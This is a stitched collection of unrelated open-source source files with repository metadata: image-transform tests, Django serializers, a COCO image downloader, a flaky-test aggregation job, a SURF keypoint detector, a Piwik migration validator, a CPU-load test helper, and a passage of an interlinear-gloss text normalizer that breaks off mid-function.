assert_raises(ValueError, SimilarityTransform, np.zeros((2, 3)))
assert_raises(ValueError, EuclideanTransform, np.zeros((2, 3)))
assert_raises(ValueError, AffineTransform,
matrix=np.zeros((2, 3)), scale=1)
assert_raises(ValueError, SimilarityTransform,
matrix=np.zeros((2, 3)), scale=1)
assert_raises(ValueError, EuclideanTransform,
matrix=np.zeros((2, 3)), translation=(0, 0))
assert_raises(ValueError, PolynomialTransform, np.zeros((3, 3)))
def test_degenerate():
src = dst = np.zeros((10, 2))
tform = SimilarityTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
tform = AffineTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
tform = ProjectiveTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
if __name__ == "__main__":
from numpy.testing import run_module_suite
run_module_suite()
| {
"content_hash": "3497378381aecde2a24cc096f4293c2f",
"timestamp": "",
"source": "github",
"line_count": 321,
"max_line_length": 77,
"avg_line_length": 33.504672897196265,
"alnum_prop": 0.6710367271036727,
"repo_name": "vighneshbirodkar/scikit-image",
"id": "98bb75243e30ecf22cafc242fc2f67916787bb16",
"size": "10755",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "skimage/transform/tests/test_geometric.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "235642"
},
{
"name": "C++",
"bytes": "44817"
},
{
"name": "Makefile",
"bytes": "567"
},
{
"name": "Python",
"bytes": "2518884"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User, Permission
from rest_framework import serializers
from core.models import Client, Project, Entry
from core.fields import DurationField
from core.models import Task
class PermissionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Permission
fields = ("id", "url", "name", "codename")
class UserSerializer(serializers.HyperlinkedModelSerializer):
perms = serializers.SerializerMethodField()
class Meta:
model = User
fields = (
"id",
"url",
"username",
"is_active",
"is_staff",
"is_superuser",
"perms",
# "groups",
)
def get_perms(self, obj):
perms = {}
if obj.is_superuser:
queryset = Permission.objects.all()
else:
queryset = Permission.objects.filter(user=obj)
for perm in queryset.values():
perms[perm["codename"]] = perm
return perms
class ClientSerializer(serializers.HyperlinkedModelSerializer):
total_projects = serializers.SerializerMethodField()
total_duration = serializers.SerializerMethodField()
class Meta:
model = Client
fields = (
"id",
"url",
"name",
"payment_id",
"archive",
"total_projects",
"total_duration",
)
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(archive=False)
def get_total_projects(self, obj):
return obj.get_total_projects()
def get_total_duration(self, obj):
return obj.get_total_duration()
class ProjectSerializer(serializers.HyperlinkedModelSerializer):
total_entries = serializers.SerializerMethodField()
total_duration = serializers.SerializerMethodField()
percent_done = serializers.SerializerMethodField()
class Meta:
model = Project
fields = (
"id",
"url",
"client",
"name",
"archive",
"estimate",
"total_entries",
"total_duration",
"percent_done",
)
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(archive=False)
def get_total_entries(self, obj):
return obj.get_total_entries()
def get_total_duration(self, obj):
return obj.get_total_duration()
def get_percent_done(self, obj):
return obj.get_percent_done()
class TaskSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Task
fields = ("id", "url", "name", "hourly_rate")
class EntrySerializer(serializers.HyperlinkedModelSerializer):
duration = DurationField()
class Meta:
model = Entry
fields = (
"id",
"url",
"project",
"task",
"user",
"date",
"duration",
"datetime_start",
"datetime_end",
"note",
)
| {
"content_hash": "3a83398963a097737011b05fc1f31932",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 67,
"avg_line_length": 24.944444444444443,
"alnum_prop": 0.5676105631562202,
"repo_name": "overshard/timestrap",
"id": "478364bd7fe605b57938e7b366716c76b8e6ed42",
"size": "3143",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/serializers.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "763"
},
{
"name": "Dockerfile",
"bytes": "478"
},
{
"name": "HTML",
"bytes": "8197"
},
{
"name": "JavaScript",
"bytes": "22880"
},
{
"name": "Python",
"bytes": "245430"
},
{
"name": "Vue",
"bytes": "65581"
}
],
"symlink_target": ""
} |
from pycocotools.coco import COCO
import numpy as np
import skimage.io as io
import os.path
import sys
if len(sys.argv) <= 1:
print("Data Type argument needs to be `val2014` or `train2014`.")
sys.exit(1)
dataDir = './data'
dataType = sys.argv[1]
fdir = '%s/%s' % (dataDir, dataType)
if not os.path.exists(fdir):
os.makedirs(fdir)
annotationFile = '%s/annotations/instances_%s.json' % (dataDir, dataType)
coco = COCO(annotationFile)
catIds = coco.getCatIds(catNms=['stop sign'])
imgIds = coco.getImgIds(catIds=catIds)
i = 1
for val in imgIds:
print("%d / %d" % (i, len(imgIds)))
id = str(val)
fname = '%s/COCO_%s_%s.jpg' % (fdir, dataType, "0" * (12-len(id)) + id)
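# e.g. with dataType 'val2014', id '391895' becomes ./data/val2014/COCO_val2014_000000391895.jpg (id zero-padded to 12 digits)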
if not os.path.exists(fname):
img = io.imread('http://mscoco.org/images/%s' % (id))
io.imsave(fname, img)
i += 1
print("Download done")
| {
"content_hash": "478337d09cbdd87aedf201b2fdf7f00d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 73,
"avg_line_length": 23.885714285714286,
"alnum_prop": 0.6519138755980861,
"repo_name": "pbrazdil/deepmask",
"id": "4db0470277e0579be25c21fcd80a1c66fdfe2862",
"size": "836",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "prepareData.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "3001562"
},
{
"name": "Lua",
"bytes": "87848"
},
{
"name": "Makefile",
"bytes": "199"
},
{
"name": "Python",
"bytes": "61140"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function
import logging
from datetime import datetime, timedelta
from changes.config import db
from changes.db.utils import try_create
from changes.lib.flaky_tests import get_flaky_tests
from changes.models import FlakyTestStat, Project, TestCase
import urllib2
def log_metrics(key, **kws):
try:
urllib2.urlopen(
"https://www.dropbox.com/build_metrics" +
"?key=%s" % key +
"".join(
"&%s=%s" % (urllib2.quote(str(k)), urllib2.quote(str(v)))
for (k, v) in kws.items()
),
timeout=10
).read()
except Exception as e:
print("Logging Failed", e)
pass
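# For illustration (derived from the code above, not part of the original
# module): a call such as log_metrics("flaky_test_reruns", flaky_runs=3)
# requests
# https://www.dropbox.com/build_metrics?key=flaky_test_reruns&flaky_runs=3
# with a 10-second timeout, and any failure is only printed, never raised.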
def aggregate_flaky_tests(day=None, max_flaky_tests=200):
if day is None:
day = datetime.utcnow().date() - timedelta(days=1)
try:
projects = Project.query.all()
for project in projects:
tests = get_flaky_tests(day, day + timedelta(days=1), [project], max_flaky_tests)
for test in tests:
first_run = db.session.query(
TestCase.date_created
).filter(
TestCase.project_id == test['project_id'],
TestCase.name_sha == test['hash']
).order_by(
TestCase.date_created
).limit(1).scalar()
log_metrics(
"flaky_test_reruns",
flaky_test_reruns_name=test['name'],
flaky_test_reruns_project_id=test['project_id'],
flaky_test_reruns_flaky_runs=test['flaky_runs'],
flaky_test_reruns_passing_runs=test['passing_runs'],
)
try_create(FlakyTestStat, {
'name': test['name'],
'project_id': test['project_id'],
'date': day,
'last_flaky_run_id': test['id'],
'flaky_runs': test['flaky_runs'],
'double_reruns': test['double_reruns'],
'passing_runs': test['passing_runs'],
'first_run': first_run
})
db.session.commit()
except Exception as err:
logging.exception(unicode(err))
| {
"content_hash": "7a5e4dca37c5d577676b575c112d4998",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 93,
"avg_line_length": 32.7887323943662,
"alnum_prop": 0.5094501718213058,
"repo_name": "bowlofstew/changes",
"id": "4df60e7770ad40ef21d9f7c80c2e0fc81fe9b5f8",
"size": "2351",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "changes/jobs/flaky_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "87142"
},
{
"name": "HTML",
"bytes": "137437"
},
{
"name": "JavaScript",
"bytes": "385108"
},
{
"name": "Makefile",
"bytes": "6212"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1546048"
},
{
"name": "Shell",
"bytes": "868"
}
],
"symlink_target": ""
} |
'''
Created on Apr 16, 2009
@author: bolme
'''
from pyvision.point.DetectorROI import DetectorROI
#import pyvision as pv
#from scipy import weave
import cv
def ExtractSURF(im,min_hessian=300):
'''
Uses OpenCV to extract SURF keypoints. The SURF descriptors are computed internally but not currently returned.
TODO: An option should be added to also compute and return the SURF descriptors.
TODO: This should be extended with options for octaves and levels.
TODO: I believe there are no memory leaks but this should be checked. cvSURFParams?
'''
cvim= im.asOpenCVBW()
#mat = int(cvim.this)
min_hessian = float(min_hessian)
#TODO: OpenCV python interface now includes cv.ExtractSURF(cvim, mask, storage, params)
#This is my (Steve's) attempt at this, but I am concerned we're not returning
# some of the information once this gets back to the caller...perhaps the parent
# class is filtering out the additional data that SURF points provide?
#TODO: Now that we have the descriptors, we need to return them to user if desired.
(keypts, _) = cv.ExtractSURF(cvim, None, cv.CreateMemStorage(), (0, min_hessian, 3, 1))
keypoints = list()
for ((x, y), laplacian, size, direction, hessian) in keypts:
keypoints.append((hessian,x,y,size,direction,laplacian) )
return keypoints
# keypoints = weave.inline(
# '''
# CvMat* im = (CvMat*)mat;
#
# CvMemStorage* storage = cvCreateMemStorage();
# CvSeq* keypoints = cvCreateSeq(0,sizeof(CvSeq),sizeof(CvSURFPoint),storage);
# cvExtractSURF(im,NULL,&keypoints,NULL,storage,cvSURFParams(min_hessian));
#
#
# int n = keypoints->total;
# PyObject* list = PyList_New(n);
# CvSURFPoint pt;
# for(int i = 0 ; i < n; i++){
# cvSeqPop(keypoints,&pt);
#
# PyObject* tuple = PyTuple_New(5);
# PyTuple_SetItem(tuple, 1, PyFloat_FromDouble(pt.pt.x));
# PyTuple_SetItem(tuple, 2, PyFloat_FromDouble(pt.pt.y));
# PyTuple_SetItem(tuple, 3, PyInt_FromLong(pt.size));
# PyTuple_SetItem(tuple, 4, PyFloat_FromDouble(pt.dir));
# PyTuple_SetItem(tuple, 0, PyFloat_FromDouble(pt.hessian));
#
# PyList_SetItem(list,i,tuple);
# //printf("%5d %10.5f %10.5f %5d %10.5f %10.5f\\n", i, pt.pt.x, pt.pt.y, pt.size, pt.dir, pt.hessian);
#
#
# cvClearMemStorage(storage);
# cvReleaseMemStorage(&storage);
#
# return_val = list;
# ''',
# arg_names=['mat','min_hessian'],
# include_dirs=['/usr/local/include'],
# headers=['<opencv/cv.h>'],
# library_dirs=['/usr/local/lib'],
# libraries=['cv']
# )
#return keypoints
class DetectorSURF(DetectorROI):
def __init__(self, min_hessian=400.0, **kwargs):
'''
'''
self.min_hessian = min_hessian
DetectorROI.__init__(self,**kwargs)
def _detect(self,im):
keypoints = ExtractSURF(im,min_hessian=self.min_hessian)
keypoints.sort(lambda x,y: -cmp(x[0],y[0]))
return keypoints
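# A minimal usage sketch (an assumption for illustration, not part of the
# original module), assuming an image loaded with pyvision's pv.Image and a
# detect() entry point provided by DetectorROI; the file name is hypothetical.
#
#   import pyvision as pv
#   im = pv.Image("face.jpg")
#   detector = DetectorSURF(min_hessian=400.0)
#   points = detector.detect(im)  # strongest keypoints first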
| {
"content_hash": "aee963fcb055756f2e2e62215f3706f6",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 114,
"avg_line_length": 36.632183908045974,
"alnum_prop": 0.6027612174458739,
"repo_name": "hitdong/pyvision",
"id": "6c1a7c825f4f982e71347b53cda8b21fcc3058f6",
"size": "3187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/pyvision/point/DetectorSURF.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1379814"
},
{
"name": "R",
"bytes": "1487"
},
{
"name": "Shell",
"bytes": "166"
}
],
"symlink_target": ""
} |
import re
import glob
import json
from scripts.migrate_piwik import utils
from scripts.migrate_piwik import settings
def main():
"""Verification of batching/anonymization script.
Asserts:
* Expected number of batch files exist for both public and private collections.
* No extra batch files exist for both public and private collections.
* All of the batch files are part of the current run.
* Number of events is consistent between public and private, and matches up with upstream counts
* No sensitive fields exist in public collections.
"""
run_id = utils.get_history_run_id_for('transform02')
complaints_file = utils.get_complaints_for('transform02', 'w')
complaints_file.write(settings.RUN_HEADER + '{}\n'.format(run_id))
batch_count = utils.get_batch_count()
complaints = 0
print('Validating private data')
complaints += verify_files('private', batch_count, run_id, complaints_file)
print('Validating public data')
complaints += verify_files('public', batch_count, run_id, complaints_file)
if complaints > 0:
print("This is {}.\n\nThat's {} {}!".format(
', '.join(['gross'] * complaints), complaints, 'whole "gross"' if complaints == 1 else '"grosses"'
))
else:
print("You've passed the final challenge! Huzzah, brave warrior!")
def verify_files(domain, batch_count, run_id, complaints_file):
complaints = 0
work_dir = utils.get_dir_for('transform02')
files = glob.glob(work_dir + '/' + domain + '-*.data')
print(' Found {} files.'.format(len(files)))
if batch_count > len(files):
complaints += 1
complaints_file.write('Too few {} files found! got {}, expected {}\n'.format(
domain, len(files), batch_count,
))
elif batch_count < len(files):
complaints += 1
complaints_file.write('Too many {} files found! got {}, expected {}\n'.format(
domain, len(files), batch_count,
))
filenum = 0
lastfile_re = domain + '\-\d*' + str(batch_count) + '\.data'
for filename in files:
filenum += 1
if not filenum % 10:
print(' Working on file: {}'.format(filename))
with open(filename, 'r') as data_file:
file_run_id = data_file.readline().replace(settings.RUN_HEADER, '').rstrip()
if file_run_id != run_id:
complaints += 1
complaints_file.write('Invalid Run ID for {}! got {}, expected {}\n'.format(
filename, file_run_id, run_id,
))
break
events = json.loads(data_file.readline())
if len(events) != settings.BATCH_SIZE and not re.search(lastfile_re, filename):
complaints += 1
complaints_file.write('Not enough events for {}! got {}, expected {}\n'.format(
filename, len(events), settings.BATCH_SIZE,
))
if domain == 'public':
eventnum = 0
for event in events:
eventnum += 1
for event_type in ('tech', 'user', 'visitor', 'geo',):
if event_type in event:  # events are plain dicts, so check keys directly
complaints += 1
complaints_file.write(
'Event {} in {} has private data! "{}" shouldn\'t be included\n'.format(
eventnum, filename, event_type
)
)
return complaints
if __name__ == "__main__":
main()
| {
"content_hash": "957ba26c7c3da3d001cf8d05e2aaeed3",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 110,
"avg_line_length": 35.99009900990099,
"alnum_prop": 0.5570839064649243,
"repo_name": "emetsger/osf.io",
"id": "9c6849b9b52c1c7ba8160e3b6b067504ef2992a0",
"size": "3635",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "scripts/migrate_piwik/validate_after_transform_02.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "160226"
},
{
"name": "HTML",
"bytes": "121662"
},
{
"name": "JavaScript",
"bytes": "1672685"
},
{
"name": "Mako",
"bytes": "660837"
},
{
"name": "Perl",
"bytes": "13885"
},
{
"name": "Python",
"bytes": "6189751"
}
],
"symlink_target": ""
} |
"""This is used by run_tests.py to create cpu load on a machine"""
while True:
pass
| {
"content_hash": "ca7b2d7c942683052477b0772ac782d8",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 66,
"avg_line_length": 21.5,
"alnum_prop": 0.6976744186046512,
"repo_name": "grani/grpc",
"id": "857addfb38658a80f344a75d7526f8c5a1cc5ba0",
"size": "1640",
"binary": false,
"copies": "40",
"ref": "refs/heads/UnityClient.1.2.0",
"path": "tools/run_tests/python_utils/antagonist.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "27445"
},
{
"name": "C",
"bytes": "6164666"
},
{
"name": "C#",
"bytes": "1456440"
},
{
"name": "C++",
"bytes": "1772100"
},
{
"name": "CMake",
"bytes": "78852"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "JavaScript",
"bytes": "352437"
},
{
"name": "M4",
"bytes": "38216"
},
{
"name": "Makefile",
"bytes": "726387"
},
{
"name": "Objective-C",
"bytes": "307089"
},
{
"name": "PHP",
"bytes": "150580"
},
{
"name": "Protocol Buffer",
"bytes": "114504"
},
{
"name": "PureBasic",
"bytes": "147"
},
{
"name": "Python",
"bytes": "1234367"
},
{
"name": "Ruby",
"bytes": "604218"
},
{
"name": "Shell",
"bytes": "56241"
},
{
"name": "Swift",
"bytes": "5418"
}
],
"symlink_target": ""
} |
'''
Created on Aug 5, 2015
@author: mlaptev
'''
class CallCount(object):
'''
This class provides functionality that can be used like a decorator
that calculates how many times decorated method has been called
'''
global_counter = 0
def __init__(self, function):
'''
Constructor
'''
self.function_to_execute = function
def __call__(self, *args):
self.increase_counter()
self.function_to_execute(*args)
@classmethod
def increase_counter(cls):
cls.global_counter += 1
@CallCount
def hello(name):
print "Hello, {}".format(name)
if __name__ == "__main__":
for i in range(10):
hello("Student #{}".format(i + 1))
print "Function has been called {} times".format(CallCount.global_counter) | {
"content_hash": "883489359d78c6c54c3b2f0977f6ccf5",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 78,
"avg_line_length": 23.25,
"alnum_prop": 0.5794504181600956,
"repo_name": "MikeLaptev/sandbox_python",
"id": "da2eaa861add0263f63b970a5826692e0fb0e087",
"size": "837",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mera/closures_and_decorators/class_decorator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Nginx",
"bytes": "591"
},
{
"name": "Python",
"bytes": "190991"
},
{
"name": "Shell",
"bytes": "713"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import sys
import re
import argparse
import logging
try:
from itertools import izip_longest as zip_longest # py2
except ImportError:
from itertools import zip_longest # py3
from xigt.codecs import xigtxml
from xigt import Item, Tier, xigtpath as xp
from odinxigt import (
copy_items,
get_tags,
remove_blank_items,
min_indent,
shift_left
)
BLANK_TAG = 'B'
LANG_CODE_PATH = 'metadata//dc:subject/@olac:code'
LANG_NAME_PATH = 'metadata//dc:subject/text()'
# quote list: https://en.wikipedia.org/wiki/Quotation_mark
QUOTES = (
'\u0022' # quotation mark (")
'\u0027' # apostrophe (')
'\u00ab' # left-pointing double-angle quotation mark
'\u00bb' # right-pointing double-angle quotation mark
'\u2018' # left single quotation mark
'\u2019' # right single quotation mark
'\u201a' # single low-9 quotation mark
'\u201b' # single high-reversed-9 quotation mark
'\u201c' # left double quotation mark
'\u201d' # right double quotation mark
'\u201e' # double low-9 quotation mark
'\u201f' # double high-reversed-9 quotation mark
'\u2039' # single left-pointing angle quotation mark
'\u203a' # single right-pointing angle quotation mark
'\u300c' # left corner bracket
'\u300d' # right corner bracket
'\u300e' # left white corner bracket
'\u300f' # right white corner bracket
'\u301d' # reversed double prime quotation mark
'\u301e' # double prime quotation mark
'\u301f' # low double prime quotation mark
'\ufe41' # presentation form for vertical left corner bracket
'\ufe42' # presentation form for vertical right corner bracket
'\ufe43' # presentation form for vertical left corner white bracket
'\ufe44' # presentation form for vertical right corner white bracket
'\uff02' # fullwidth quotation mark
'\uff07' # fullwidth apostrophe
'\uff62' # halfwidth left corner bracket
'\uff63' # halfwidth right corner bracket
)
# note: adding grave accent (`) and comma (,) as they've been observed
# serving as quotes
# edit: commented out (grave sometimes closes, frequently opens)
QUOTEPAIRS = {
'\u0022': ['\u0022'], # quotation mark (")
'\u0027': ['\u0027'], # apostrophe (')
#'\u002c': ['\u0027', '\u0060'], # comma/(apostrophe|grave-accent)
'\u0060': ['\u0027'], # grave-accent/apostrophe
'\u00ab': ['\u00bb'], # left/right-pointing double-angle quotation mark
'\u00bb': ['\u00ab', '\u00bb'], # right/(left|right)-pointing double-angle quotation mark
'\u2018': ['\u2019'], # left/right single quotation mark
'\u2019': ['\u2019'], # right single quotation mark
'\u201a': ['\u201b', '\u2018', '\u2019'], # single low-9/(high-reversed-9|left-single|right-single) quotation mark
'\u201b': ['\u2019'], # single high-reversed-9/right-single quotation mark
'\u201c': ['\u201d'], # left/right double quotation mark
'\u201d': ['\u201d'], # right double quotation mark
'\u201e': ['\u201c', '\u201d'], # double-low-9/(left-double|right-double) quotation mark
'\u201f': ['\u201d'], # double-high-reversed-9/right-double quotation mark
'\u2039': ['\u203a'], # single left/right-pointing angle quotation mark
'\u203a': ['\u2039', '\u203a'], # single right/(left|right)-pointing angle quotation mark
'\u300c': ['\u300d'], # left/right corner bracket
'\u300e': ['\u300f'], # left/right white corner bracket
'\u301d': ['\u301e'], # reversed/* double prime quotation mark
'\u301f': ['\u301e'], # low/* double prime quotation mark
'\ufe41': ['\ufe42'], # presentation form for vertical left/right corner bracket
'\ufe43': ['\ufe44'], # presentation form for vertical left/right corner white bracket
'\uff02': ['\uff02'], # fullwidth quotation mark
'\uff07': ['\uff07'], # fullwidth apostrophe
'\uff62': ['\uff63'] # halfwidth left/right corner bracket
}
OPENQUOTES = ''.join(QUOTEPAIRS.keys())
CLOSEQUOTES = ''.join(q for qs in QUOTEPAIRS.values() for q in qs)
def normalize_corpus(xc):
for igt in xc:
base_tier = None
norm_tier = None
for tier in igt:
if tier.type == 'odin':
state = tier.attributes.get('state')
# don't get raw tier if cleaned exists
if base_tier is None and state == 'raw':
base_tier = tier
elif state == 'cleaned':
base_tier = tier
elif state == 'normalized':
norm_tier = tier
if base_tier is None:
logging.info(
'No cleaned tier found for normalizing for IGT with id: {}'
.format(str(igt.id))
)
elif norm_tier is not None:
logging.warning(
'Normalized tier already found for IGT with id: {}'
.format(str(igt.id))
)
else:
add_normalized_tier(igt, base_tier)
def add_normalized_tier(igt, base_tier):
norm_id = None
# check if ID is available
for n_id in ('n', 'on', 'normalized', 'odin-normalized'):
if igt.get(n_id) is None:
norm_id = n_id
break
if norm_id is None:
logging.warning(
'No preset ID for normalized tier was available '
'for IGT with id: {}'
.format(str(igt.id))
)
else:
norm_items = normalize_items(base_tier, norm_id)
tier = Tier(
id=norm_id,
type='odin',
alignment=base_tier.id,
attributes={'state': 'normalized'},
items=norm_items
)
igt.append(tier)
def normalize_items(base_tier, norm_id):
# first make copies of the original items
items = copy_items(base_tier.items)
items = remove_blank_items(items) # don't bother with blank lines
items = rejoin_continuations(items)
items = rejoin_translations(items)
items = remove_citations(items)
items = remove_language_name(items, base_tier.igt)
items = remove_example_numbers(items)
items = remove_blank_items(items) # in case previous created blanks
for item in items:
# and set the copy's alignments to their current ID (changed later)
item.alignment = item.id
rejoin_hyphenated_grams(item)
extract_judgment(item)
# any remaining tag=B items should be changed to tag=M
# (because they aren't blank)
tags = get_tags(item)
if tags[0] == 'B':
tags = ['M'] + tags[1:]
item.attributes['tag'] = '+'.join(tags)
items = separate_secondary_translations(items)
items = dewrap_lines(items)
items = unquote_translations(items)
items = shift_left(items, tags=('L','G','L-G','L-T','G-T','L-G-T'))
for i, item in enumerate(items):
item.id = '{}{}'.format(norm_id, i + 1)
return items
def whitespace(m):
start, end = m.span()
return ' ' * (end - start)
def merge_items(*items):
alignment = ','.join(i.alignment for i in items if i.alignment)
content = ','.join(i.content for i in items if i.content)
segmentation = ','.join(i.segmentation for i in items if i.segmentation)
if segmentation and (alignment or content):
raise ValueError(
'Cannot merge items defining segmentation and another '
'reference attribute.'
)
base = items[0]
base.text = ' '.join(i.text for i in items)
base.attributes['line'] = ' '.join(i.attributes['line'] for i in items)
if alignment: base.alignment = alignment
if content: base.content = content
if segmentation: base.segmentation = segmentation
pri_tags = set()
sec_tags = set()
for item in items:
tags = get_tags(item)
if tags[0]:
pri_tags.add(tags[0])
sec_tags.update(tags[1:])
tag = '-'.join(sorted(pri_tags)).replace('G-L', 'L-G')
if sec_tags:
tag = '{}+{}'.format(tag, '+'.join(sorted(sec_tags)))
base.attributes['tag'] = tag
def rejoin_continuations(items):
new_items = []
for item in items:
tags = get_tags(item)
if tags[0] == 'C' and new_items:
item.text = item.text.lstrip()
item.attributes['tag'] = item.attributes['tag'][1:] # remove C
merge_items(new_items[-1], item)
else:
new_items.append(item)
return new_items
def rejoin_translations(items):
# rejoin translation lines if they don't start with some kind of
# speaker indicator, quote, or other
new_items = []
prev_is_t = False
prev_end = False
for item in items:
tags = get_tags(item)
is_t = tags[0] == 'T' and 'DB' not in tags and 'CR' not in tags
marked = re.match(
r'^\s*[(\[]?\s*\S+\s*\.?\s*[)\]]?\s*:', item.text, re.U
)
if prev_is_t and is_t and not marked and not prev_end:
item.text = item.text.lstrip()
merge_items(new_items[-1], item)
else:
new_items.append(item)
prev_is_t = is_t
end_match = re.search(r'[{}] *\)* *$'.format(CLOSEQUOTES), item.text)
prev_end = end_match is not None
return new_items
citation_re = re.compile(
r'(\s{3}( [-a-zA-Z]+){1,4} ?|=?)'
'('
r'\[(?P<inner1>([^\]]*(\([^\)]*\))?)[0-9]*([^\]]*(\([^)]*\))?))\]'
r'|'
r'\((?P<inner2>([^)]*(\([^)]*\))?)[0-9]*([^)]*(\([^)]*\))?))\)'
')'
r'\s*$',
re.U
)
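# Move trailing citation-like material (e.g. author/year in brackets or parens)
# off L/G/T lines into separate meta (M) items when it can safely be removed.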
def remove_citations(items):
def removable(m, t, i):
# citation matches are removable if they don't look like
# translation alternates or bracketed glosses
if t in ('L', 'G'):
start, end = m.span()
other = None
if t == 'L': # look down then up for nearest G
others = items[i+1:] + items[i-1::-1]
t2 = 'G'
else: # look up then down for nearest L
                others = items[i-1::-1] + items[i+1:]
t2 = 'L'
other = next((i for i in others if get_tags(i)[0] == t2), None)
if other and (other.text or '')[start:end].strip() != '':
return False
elif re.match(r'\s*[{}].*[{}]\s*$'.format(OPENQUOTES, CLOSEQUOTES),
m.group('inner1') or m.group('inner2'),
re.U):
return False
return True
new_items = []
for i, item in enumerate(items):
new_items.append(item) # add now; text might be modified later
tags = get_tags(item)
if tags[0] not in ('L', 'G', 'T', 'L-G', 'L-T', 'L-G-T'):
continue
match = citation_re.search(item.text)
if (match and removable(match, tags[0], i)):
meta_item = Item(id=item.id,
text=match.group(0).strip(),
                             attributes=dict(item.attributes))
m_tags = ['M']
item.text = citation_re.sub('', item.text).rstrip()
if 'AC' in tags:
tags.remove('AC')
m_tags.append('AC')
elif 'LN' in tags:
tags.remove('LN')
m_tags.append('LN')
elif 'CN' in tags:
tags.remove('CN')
m_tags.append('CN')
# what about other tags? LN, CN, EX
item.attributes['tag'] = '+'.join(tags)
meta_item.attributes['tag'] = '+'.join(m_tags)
new_items.append(meta_item)
return new_items
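# Strip language names/ISO codes from the start or end of non-meta lines,
# recording the removed text as M+LN meta items.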
def remove_language_name(items, igt):
new_items = []
lgcode = xp.find(igt, LANG_CODE_PATH)
lgname = xp.find(igt, LANG_NAME_PATH)
lgtoks = []
if lgcode and '?' not in lgcode and '*' not in lgcode:
codes = set(lgcode.split(':')) # split up complex codes
codes.update(map(str.upper, list(codes)))
codes.update(map(str.lower, list(codes)))
lgtoks.extend(codes)
if lgname and '?' not in lgname:
lgtoks.append(lgname)
lgtoks.append(lgname.upper())
if re.search('[- ]', lgname, re.U): # abbreviation for multiword names
lgtoks.append(''.join(ln[0]
                                  for ln in re.split(r'[- ]+', lgname, flags=re.U)))
if re.search(r'^\w{3}', lgname, re.U):
lgtoks.append(lgname[:3])
if lgtoks:
sig = '|'.join(re.escape(t) for t in lgtoks)
start_lg_re = re.compile(r'^\s*[(\[]?({})[)\]]?'
.format(sig), re.U)
end_lg_re = re.compile(r'[(\[]?({})[)\]]?\s*$'
.format(sig), re.U)
for item in items:
new_items.append(item) # add now; might be modified later
tags = get_tags(item)
if tags[0] != 'M':
orig = item.text
m = start_lg_re.match(item.text)
if m:
meta_item = Item(id=item.id,
text=m.group(0).strip(),
attributes=dict(item.attributes))
meta_item.attributes['tag'] = 'M+LN'
new_items.append(meta_item)
item.text = start_lg_re.sub(whitespace, item.text)
m = end_lg_re.search(item.text)
if m:
meta_item = Item(id=item.id,
text=m.group(0).strip(),
attributes=dict(item.attributes))
meta_item.attributes['tag'] = 'M+LN'
                    new_items.append(meta_item)
item.text = end_lg_re.sub(whitespace, item.text).rstrip()
if 'LN' in tags and item.text != orig:
tags.remove('LN')
item.attributes['tag'] = '+'.join(tags)
else:
new_items = items
return new_items
ex_num_re = re.compile(
'^(?P<exnum>'
r'\s*'
r'(?P<paren>[(\[])?\s*'
r'(?P<pre>ex|\w)?'
r'(?(pre)[\d.]+|([\d.]+\w?|\w|[ivxlc]+))'
r'(?(paren)[\'.]*|[\'.)])'
r'(?(paren)\s*[)\]])'
')' # end exnum
r'\s',
re.I|re.U
)
def remove_example_numbers(items):
# IGT-initial numbers (e.g. '1.' '(1)', '5a.', '(ii)')
def removable(m):
start, end = m.span()
end -= 1 # ignore the required final space
mtext = m.group('exnum')
for item in items:
tags = get_tags(item)
if tags[0] not in ('L', 'G', 'T', 'L-G', 'G-T', 'L-T', 'L-G-T'):
continue
text = (item.text or '')[start:end]
if text != mtext and text.strip() != '':
return False
return True
for item in items:
tags = get_tags(item)
if tags[0] in ('L-G', 'L-T', 'G-T', 'L-G-T'):
item.text = ex_num_re.sub(whitespace, item.text)
elif tags[0] in ('L', 'G', 'T'):
m = ex_num_re.match(item.text)
while m and removable(m):
item.text = ex_num_re.sub(whitespace, item.text)
m = ex_num_re.match(item.text)
return items
# def remove_precontent_tags(item):
# # precontent tags can be 1 or 2 words ("intended:" or "speaker", "a:")
# # ignore those with 3 or more
# item.text = re.sub(r'^\s*\w+(\s\w+)?\s*:\s', '', item.text)
def rejoin_hyphenated_grams(item):
# there may be morphemes separated by hyphens, but with intervening
# spaces; slide the token over (e.g. "dog- NOM" => "dog-NOM ")
tags = get_tags(item)
delims = {
'L': '-=',
'L-G': '-=',
'G': '-=.'
